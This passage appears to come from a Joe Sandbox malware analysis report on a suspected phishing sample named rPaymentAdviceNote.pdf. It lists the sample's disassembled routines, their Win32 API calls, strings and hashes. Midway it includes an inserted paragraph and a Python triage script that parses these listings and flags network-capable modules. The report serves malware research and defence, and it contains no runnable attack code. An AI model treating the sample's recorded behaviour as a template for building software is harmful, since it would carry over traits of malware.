                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: __i64tow__itow__swprintf
                                                              • String ID: %.15g$0x%p$False$True
                                                              • API String ID: 421087845-2263619337
                                                              • Opcode ID: 1b2ed22ca7315986670907ad3247e9de53763b04d7964af041a214010d4bed6f
                                                              • Instruction ID: bf6f49e0d367c4cce5fe8a840836cb7a3ac5077f7c60a18d399129781743332d
                                                              • Opcode Fuzzy Hash: 1b2ed22ca7315986670907ad3247e9de53763b04d7964af041a214010d4bed6f
                                                              • Instruction Fuzzy Hash: 4241E27160420DAFEB24DF39D842E7AB3E9FF45304F2044BEE689D7296EA31D9018B11
                                                              APIs
                                                              • _memset.LIBCMT ref: 008C716A
                                                              • CreateMenu.USER32 ref: 008C7185
                                                              • SetMenu.USER32(?,00000000), ref: 008C7194
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008C7221
                                                              • IsMenu.USER32(?), ref: 008C7237
                                                              • CreatePopupMenu.USER32 ref: 008C7241
                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008C726E
                                                              • DrawMenuBar.USER32 ref: 008C7276
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                              • String ID: 0$F
                                                              • API String ID: 176399719-3044882817
                                                              • Opcode ID: cbf017eea25b37d93eb7d2dbc2a6b62b09457053bfc396f5b73903eb3afc4b72
                                                              • Instruction ID: 6e79afcd1ed04b49e84a494338d7aaec17422231f4ee67f392beb1f15afaddc6
                                                              • Opcode Fuzzy Hash: cbf017eea25b37d93eb7d2dbc2a6b62b09457053bfc396f5b73903eb3afc4b72
                                                              • Instruction Fuzzy Hash: 3B412675A05209AFEB20DF64D944F9A7BB9FB48350F144029FA4697361D731A910DF90
                                                              APIs
                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 008C755E
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 008C7565
                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 008C7578
                                                              • SelectObject.GDI32(00000000,00000000), ref: 008C7580
                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 008C758B
                                                              • DeleteDC.GDI32(00000000), ref: 008C7594
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 008C759E
                                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 008C75B2
                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 008C75BE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                              • String ID: static
                                                              • API String ID: 2559357485-2160076837
                                                              • Opcode ID: 8feb3a82f313806526877fe8b40df3b256531e7c97ede6bff24a92d3be37ebf1
                                                              • Instruction ID: 8999dae839a1f7fce17843c04582d90b9e5932efaab1bd55aed9e136498cdbed
                                                              • Opcode Fuzzy Hash: 8feb3a82f313806526877fe8b40df3b256531e7c97ede6bff24a92d3be37ebf1
                                                              • Instruction Fuzzy Hash: 24315672104218ABEF129F64DC09FEA3B7AFF09720F110229FA15E61A1C731D821DBA4
                                                              APIs
                                                              • _memset.LIBCMT ref: 00866E3E
                                                                • Part of subcall function 00868B28: __getptd_noexit.LIBCMT ref: 00868B28
                                                              • __gmtime64_s.LIBCMT ref: 00866ED7
                                                              • __gmtime64_s.LIBCMT ref: 00866F0D
                                                              • __gmtime64_s.LIBCMT ref: 00866F2A
                                                              • __allrem.LIBCMT ref: 00866F80
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00866F9C
                                                              • __allrem.LIBCMT ref: 00866FB3
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00866FD1
                                                              • __allrem.LIBCMT ref: 00866FE8
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00867006
                                                              • __invoke_watson.LIBCMT ref: 00867077
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                              • String ID:
                                                              • API String ID: 384356119-0
                                                              • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                              • Instruction ID: 3d845aef91e77a57d3f3dbc5ad194bbc6f1d6dd95b18e31683464dafef8c305a
                                                              • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                              • Instruction Fuzzy Hash: A971E476A00B17EBD714EE6DDC42B6AB7A8FF04324F158229F514D6281FB71DA1087D2
                                                              APIs
                                                              • _memset.LIBCMT ref: 008A2542
                                                              • GetMenuItemInfoW.USER32(00905890,000000FF,00000000,00000030), ref: 008A25A3
                                                              • SetMenuItemInfoW.USER32(00905890,00000004,00000000,00000030), ref: 008A25D9
                                                              • Sleep.KERNEL32(000001F4), ref: 008A25EB
                                                              • GetMenuItemCount.USER32(?), ref: 008A262F
                                                              • GetMenuItemID.USER32(?,00000000), ref: 008A264B
                                                              • GetMenuItemID.USER32(?,-00000001), ref: 008A2675
                                                              • GetMenuItemID.USER32(?,?), ref: 008A26BA
                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 008A2700
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008A2714
                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008A2735
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                              • String ID:
                                                              • API String ID: 4176008265-0
                                                              • Opcode ID: a2295ac95f4b6de13f957a8757a2bc8e1904bb9bcf32d44a5dcbc950b4dde059
                                                              • Instruction ID: e36d9ca90dd2fabc2ece90eedf8b888be410c8d07120e4d604c0cfda40db8967
                                                              • Opcode Fuzzy Hash: a2295ac95f4b6de13f957a8757a2bc8e1904bb9bcf32d44a5dcbc950b4dde059
                                                              • Instruction Fuzzy Hash: 35619C70901249AFEB21CFACDD88EBE7BB9FB06308F140059E952E3651D731AE05DB21
                                                              APIs
                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 008C6FA5
                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 008C6FA8
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 008C6FCC
                                                              • _memset.LIBCMT ref: 008C6FDD
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008C6FEF
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 008C7067
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$LongWindow_memset
                                                              • String ID:
                                                              • API String ID: 830647256-0
                                                              • Opcode ID: 5edc0df768a985d157fe659ff7558f2de75845d2893535ec528e5d71f6bbeacc
                                                              • Instruction ID: 026304b10acfbcb7baaee1ba2446148245d2c3e2a850e5117c51561bbc935e6a
                                                              • Opcode Fuzzy Hash: 5edc0df768a985d157fe659ff7558f2de75845d2893535ec528e5d71f6bbeacc
                                                              • Instruction Fuzzy Hash: 61613675904208AFDB11DFA8CC81FAE77B8FB09714F14416AFA14EB2A1D771A941DF90
                                                              APIs
                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00896BBF
                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00896C18
                                                              • VariantInit.OLEAUT32(?), ref: 00896C2A
                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00896C4A
                                                              • VariantCopy.OLEAUT32(?,?), ref: 00896C9D
                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00896CB1
                                                              • VariantClear.OLEAUT32(?), ref: 00896CC6
                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00896CD3
                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00896CDC
                                                              • VariantClear.OLEAUT32(?), ref: 00896CEE
                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00896CF9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                              • String ID:
                                                              • API String ID: 2706829360-0
                                                              • Opcode ID: 5b30d547fad2b8cd8219d1f152d21bba8aa2f502ea734b2bb9212a66afea4602
                                                              • Instruction ID: ecde5d267e5cdd00bb1fdfdf1f4a06ce44d4e0210dcd455a8556f6f6d1fea897
                                                              • Opcode Fuzzy Hash: 5b30d547fad2b8cd8219d1f152d21bba8aa2f502ea734b2bb9212a66afea4602
                                                              • Instruction Fuzzy Hash: B3417F71A002199FDF04EFA8D844DAEBBB9FF08354F048069FA55E7261DB30A955CB91
                                                              APIs
                                                                • Part of subcall function 00849837: __itow.LIBCMT ref: 00849862
                                                                • Part of subcall function 00849837: __swprintf.LIBCMT ref: 008498AC
                                                              • CoInitialize.OLE32 ref: 008B8403
                                                              • CoUninitialize.OLE32 ref: 008B840E
                                                              • CoCreateInstance.OLE32(?,00000000,00000017,008D2BEC,?), ref: 008B846E
                                                              • IIDFromString.OLE32(?,?), ref: 008B84E1
                                                              • VariantInit.OLEAUT32(?), ref: 008B857B
                                                              • VariantClear.OLEAUT32(?), ref: 008B85DC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                              • API String ID: 834269672-1287834457
                                                              • Opcode ID: 4a94a97c0c8d7efd32d1c8ef09279d21e7817d2a1dbac778b265aa8eec153859
                                                              • Instruction ID: 08dc82bd17e40636e861d1cd7c50ea137e9d6022f5eca409a6ffcefba66a44bc
                                                              • Opcode Fuzzy Hash: 4a94a97c0c8d7efd32d1c8ef09279d21e7817d2a1dbac778b265aa8eec153859
                                                              • Instruction Fuzzy Hash: FD614670608216DFD720DF28C849AAABBE8FF49754F044519F985DB391CB70E948CB96
                                                              APIs
                                                              • WSAStartup.WSOCK32(00000101,?), ref: 008B5793
                                                              • inet_addr.WSOCK32(?,?,?), ref: 008B57D8
                                                              • gethostbyname.WSOCK32(?), ref: 008B57E4
                                                              • IcmpCreateFile.IPHLPAPI ref: 008B57F2
                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 008B5862
                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 008B5878
                                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 008B58ED
                                                              • WSACleanup.WSOCK32 ref: 008B58F3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                              • String ID: Ping
                                                              • API String ID: 1028309954-2246546115
                                                              • Opcode ID: 09847c16cc3c410261f049e5840e2af1479b5c0a3f2cc7157b08d5ac883f064f
                                                              • Instruction ID: 6c5c48e7de36cd59cdda97a99d078abb859b97991e741df25c312f82ad3d32ee
                                                              • Opcode Fuzzy Hash: 09847c16cc3c410261f049e5840e2af1479b5c0a3f2cc7157b08d5ac883f064f
                                                              • Instruction Fuzzy Hash: 84514D316046049FDB21EF29DC45B6A7BE4FF48724F04452AF996DB3A2DB70E900DB52
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 008AB4D0
                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 008AB546
                                                              • GetLastError.KERNEL32 ref: 008AB550
                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 008AB5BD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                              • API String ID: 4194297153-14809454
                                                              • Opcode ID: a160c2c62ea5d84ec032e6da1a89886d41ad1433ee04bdf324abb06b98f7f191
                                                              • Instruction ID: 5942aefb6944d9a7748622c2987b5a6d2e7c5eae72f023126d90173e65f82917
                                                              • Opcode Fuzzy Hash: a160c2c62ea5d84ec032e6da1a89886d41ad1433ee04bdf324abb06b98f7f191
                                                              • Instruction Fuzzy Hash: D8318035E00209DFEB10EBA8C845EBE7BB4FF4A314F144126E615D7692DB71DA41CB51
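The API listings in this report follow one fixed shape per line: `Name.MODULE(arg,arg,...), ref: address`, with `?` for an argument the disassembler could not resolve, 8-digit hex for constants and a bare word for a resolved string literal such as `READY`. When triaging a long report like this one it helps to pull those lines into structured records so that the network-capable routines (the WSOCK32/IPHLPAPI ping routine at 008B5793 above) can be separated from the USER32/GDI32/LIBCMT scaffolding that makes up most of the listing. The Python below is an added example, not part of the Joe Sandbox report or its tooling; the input is a constructed excerpt copied from the listings above, the `NETWORK_MODULES` set is the author's own choice of what counts as network-capable, and the timeout decoding relies on the documented IPHLPAPI signature of `IcmpSendEcho`, whose eighth parameter is the reply timeout in milliseconds.

```python
import re
from collections import defaultdict

# Constructed input: a handful of "APIs" lines copied from the report above
# (the ping routine at 008B5793.., the drive-status routine at 008AB4D0..,
# one subcall line and one menu call with a negative constant).
REPORT_LINES = """
• WSAStartup.WSOCK32(00000101,?), ref: 008B5793
• inet_addr.WSOCK32(?,?,?), ref: 008B57D8
• gethostbyname.WSOCK32(?), ref: 008B57E4
• IcmpCreateFile.IPHLPAPI ref: 008B57F2
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 008B5862
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 008B58ED
• WSACleanup.WSOCK32 ref: 008B58F3
• SetErrorMode.KERNEL32(00000001), ref: 008AB4D0
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 008AB546
• GetLastError.KERNEL32 ref: 008AB550
• SetErrorMode.KERNEL32(00000000,READY), ref: 008AB5BD
  • Part of subcall function 00849837: __itow.LIBCMT ref: 00849862
• _memset.LIBCMT ref: 008A2542
• GetMenuItemID.USER32(?,-00000001), ref: 008A2675
"""

# One call per line: "<name>.<module>[(<args>)][,] ref: <hex address>", optionally
# prefixed by "Part of subcall function <addr>:" for calls made by a callee.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[\w$?@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Assumption: these modules indicate network capability for triage purposes.
NETWORK_MODULES = {"WSOCK32", "WS2_32", "IPHLPAPI", "WININET", "WINHTTP", "DNSAPI"}


def parse_arg(tok):
    """'?' -> None (unresolved), 8 hex digits (optionally negative) -> int,
    anything else is a string literal the disassembler resolved (e.g. 'READY')."""
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"-?[0-9A-F]{8}", tok):
        return int(tok, 16)
    return tok


def parse_api_lines(text):
    """Turn report 'APIs' lines into dicts; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if not m:
            continue
        args_field = m.group("args")
        args = [] if not args_field else [parse_arg(a) for a in args_field.split(",")]
        calls.append({
            "name": m.group("name"),
            "module": m.group("module"),
            "args": args,
            "ref": int(m.group("ref"), 16),
            "subcall": m.group("sub"),   # caller address when listed as a subcall
        })
    return calls


def calls_by_module(calls):
    """Map module name -> list of API names, in listing order."""
    groups = defaultdict(list)
    for c in calls:
        groups[c["module"]].append(c["name"])
    return dict(groups)


def network_calls(calls):
    return [c for c in calls if c["module"] in NETWORK_MODULES]


def icmp_echo_timeout_ms(calls):
    """IcmpSendEcho(IcmpHandle, DestinationAddress, RequestData, RequestSize,
    RequestOptions, ReplyBuffer, ReplySize, Timeout): the last argument is the
    timeout in milliseconds. Returns it for the first fully listed call."""
    for c in calls:
        if c["name"] == "IcmpSendEcho" and len(c["args"]) == 8:
            return c["args"][7]
    return None


if __name__ == "__main__":
    parsed = parse_api_lines(REPORT_LINES)
    for module, names in calls_by_module(parsed).items():
        flag = "NET" if module in NETWORK_MODULES else "   "
        print(f"{flag} {module:10} {', '.join(names)}")
    print("IcmpSendEcho timeout (ms):", icmp_echo_timeout_ms(parsed))
```

Run against the whole "APIs" section of a report, the module grouping gives a quick inventory of which routines touch the network, registry, or process memory, and the decoded constants (here the 0xFA0 timeout, 4000 ms) can be compared against known runtime defaults when deciding whether a routine is interpreter scaffolding or the payload's own code.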
                                                              APIs
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                                • Part of subcall function 0089AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0089AABC
                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00899014
                                                              • GetDlgCtrlID.USER32 ref: 0089901F
                                                              • GetParent.USER32 ref: 0089903B
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 0089903E
                                                              • GetDlgCtrlID.USER32(?), ref: 00899047
                                                              • GetParent.USER32(?), ref: 00899063
                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00899066
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 1536045017-1403004172
                                                              • Opcode ID: 3ddc11d427f45fbc03c538fc4c8ddd2d178e95efa72fffb70ee5f06c104d07f4
                                                              • Instruction ID: ac36574212643422903f3ebc67abbf36448945dff290c0c5a4536f28f6e6674a
                                                              • Opcode Fuzzy Hash: 3ddc11d427f45fbc03c538fc4c8ddd2d178e95efa72fffb70ee5f06c104d07f4
                                                              • Instruction Fuzzy Hash: E721B270A00108BBDF04ABA4CC85EFEBB75FF59310F140119FA61D72A2EB755815DB21
                                                              APIs
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                                • Part of subcall function 0089AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0089AABC
                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 008990FD
                                                              • GetDlgCtrlID.USER32 ref: 00899108
                                                              • GetParent.USER32 ref: 00899124
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00899127
                                                              • GetDlgCtrlID.USER32(?), ref: 00899130
                                                              • GetParent.USER32(?), ref: 0089914C
                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 0089914F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                               • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 1536045017-1403004172
                                                              • Opcode ID: 92572c6039583fcf34ff427ef62345f330ccd105297a590dfcb7c57dbfd60063
                                                              • Instruction ID: 358a7e8c353eec3df9dcd61ce5494add8b41be2bb76efd75db9f21020ee57f63
                                                              • Opcode Fuzzy Hash: 92572c6039583fcf34ff427ef62345f330ccd105297a590dfcb7c57dbfd60063
                                                              • Instruction Fuzzy Hash: 9921DA74A00108BBEF05ABA8CC85EFEBB75FF58300F144019F661D72A2EB795415DB21
                                                              APIs
                                                              • GetParent.USER32 ref: 0089916F
                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00899184
                                                              • _wcscmp.LIBCMT ref: 00899196
                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00899211
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
